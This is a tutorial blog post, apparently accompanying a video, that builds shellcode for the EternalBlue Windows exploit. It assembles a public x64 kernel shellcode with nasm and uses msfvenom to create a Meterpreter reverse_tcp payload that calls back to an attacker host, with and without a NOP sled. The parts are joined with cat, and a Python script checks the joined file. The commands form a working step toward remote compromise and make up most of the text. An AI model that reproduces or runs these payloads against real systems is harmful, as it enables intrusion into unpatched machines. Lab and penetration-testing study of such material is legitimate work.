Generating shellcode - using msfvenom to generate a binary payload

In this video we generate a binary payload (shellcode) that we will use later on to exploit the EternalBlue Windows OS vulnerability.

The article below is an excellent introduction to how a binary payload works:
https://blog.rapid7.com/2015/03/25/stageless-meterpreter-payloads/

Our payload has 2 parts that will be generated independently, then combined into a single file.

The first component is the Windows x64 kernel shellcode for the EternalBlue exploit; its ASM source is downloaded from the following location:
https://gist.github.com/worawit/05105fce9e126ac9c85325f0b05d6501

We will use "nasm" (a general-purpose x86 assembler) on Kali Linux to assemble the kernel shellcode, using the command below:

nasm -f bin eternalblue_x64_kshellcode.asm -o sc_x64_kernel.bin

The output of this command (and the first component of our payload) is the "sc_x64_kernel.bin" file.

The second component of our payload is the code that creates the Meterpreter session from the target back to the attacker machine. It is generated with the "msfvenom" utility and the "windows/x64/meterpreter/reverse_tcp" payload, as per the command below:

msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -o sc_x64_msf.bin LHOST=192.168.254.142 LPORT=4444

The output of this command (and the second component of our payload) is the "sc_x64_msf.bin" file.
The IP address and the port belong to the attacker machine (LHOST and LPORT) and the matching handler will have to be configured in Metasploit before exploitation (this will be shown in my next posts).

For more details on the "msfvenom" command, please check the following link:
https://www.offensive-security.com/metasploit-unleashed/msfvenom/

Another version of the Meterpreter payload is also created in the video. It is identical to the first version except that a 100-byte NOP sled is prepended to it (the "-n 100" option).

The NOP sled version of the Meterpreter payload is created with the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -n 100 -o sc_x64_msf_100n.bin LHOST=192.168.254.142 LPORT=4444

The output is the "sc_x64_msf_100n.bin" file.

A NOP sled makes buffer overflow exploitation more forgiving: execution can land anywhere inside the sled and slide forward into the payload, so the exact entry address matters less. There might be cases where the payload without a NOP sled crashes the OS on the target machine, while the payload with a NOP sled works without issues. We keep the NOP sled payload as an alternative for the case where we have issues during the exploitation phase.

Finally, we combine the two payload components into one file using the "cat" command:

- first, using the kernel shellcode file and the Meterpreter payload without the NOP sled, with the following command:

cat sc_x64_kernel.bin sc_x64_msf.bin > sc_x64.bin

- second, using the kernel shellcode file and the NOP sled Meterpreter payload, with the following command:

cat sc_x64_kernel.bin sc_x64_msf_100n.bin > sc_x64_100n.bin

We now have two binary payloads ("sc_x64.bin" and "sc_x64_100n.bin") that we will be using later on to exploit the EternalBlue Windows OS vulnerability.
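Because "cat" does nothing more than append one file to the other, the layout of the combined file is fully predictable, and it is worth checking that before the files are used. The following helper is an added example (not part of the original post or of any Metasploit tooling): it reproduces the concatenation step, verifies that a combined file really is kernel part followed by Meterpreter part, reports the offset at which the second component starts, its SHA-256, and the length of the NOP run at the front of the second component (covering both the combining step and the NOP sled variant above). The sample byte strings are constructed placeholders, not real shellcode, and the NOP count only looks for 0x90; msfvenom's x64 NOP generator may mix in other single-byte instructions, so for a real "-n 100" file the reported count is assumed to be a lower bound.

```python
"""Verify a payload assembled with `cat part1 part2 > combined`.

Added example, not code from the original post. The inputs stand in for
sc_x64_kernel.bin and sc_x64_msf.bin / sc_x64_msf_100n.bin; the sample
bytes at the bottom are constructed placeholders, not real shellcode.
"""
import hashlib
from pathlib import Path

# Single-byte instructions counted as part of a NOP sled. Only 0x90 is
# listed here; msfvenom's x64 NOP generator may use other single-byte
# instructions, so for real output this count is a lower bound (assumption).
NOP_BYTES = {0x90}


def combine(kernel: bytes, stage: bytes) -> bytes:
    """Same result as `cat kernel stage > combined`: plain concatenation."""
    return kernel + stage


def leading_nops(stage: bytes) -> int:
    """Length of the run of NOP bytes at the very start of the second part."""
    n = 0
    for b in stage:
        if b not in NOP_BYTES:
            break
        n += 1
    return n


def describe(combined: bytes, kernel: bytes, stage: bytes) -> dict:
    """Check that `combined` is exactly kernel||stage and report its layout."""
    return {
        "valid_concatenation": combined == combine(kernel, stage),
        "total_len": len(combined),
        "kernel_len": len(kernel),
        "stage_offset": len(kernel),   # second part starts right after the kernel part
        "stage_len": len(stage),
        "nop_sled_len": leading_nops(stage),
        "sha256": hashlib.sha256(combined).hexdigest(),
    }


def describe_files(combined_path: str, kernel_path: str, stage_path: str) -> dict:
    """File-based wrapper for the real .bin outputs produced in the post."""
    return describe(
        Path(combined_path).read_bytes(),
        Path(kernel_path).read_bytes(),
        Path(stage_path).read_bytes(),
    )


# --- constructed sample data (placeholders, not real shellcode) ---
SAMPLE_KERNEL = bytes.fromhex("4831c0c3")                # xor rax,rax ; ret
SAMPLE_STAGE = bytes.fromhex("4831c948c7c101000000c3")  # xor rcx,rcx ; mov rcx,1 ; ret
SAMPLE_STAGE_NOPS = b"\x90" * 100 + SAMPLE_STAGE         # stand-in for the -n 100 variant

if __name__ == "__main__":
    for name, stage in (("sc_x64.bin", SAMPLE_STAGE), ("sc_x64_100n.bin", SAMPLE_STAGE_NOPS)):
        print(name, describe(combine(SAMPLE_KERNEL, stage), SAMPLE_KERNEL, stage))
```

Run against the real files as `describe_files("sc_x64_100n.bin", "sc_x64_kernel.bin", "sc_x64_msf_100n.bin")`; a "valid_concatenation" of False means the wrong pair of components was concatenated or a file was regenerated after the combined file was built, and the SHA-256 gives a stable identifier for each build of the combined file.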

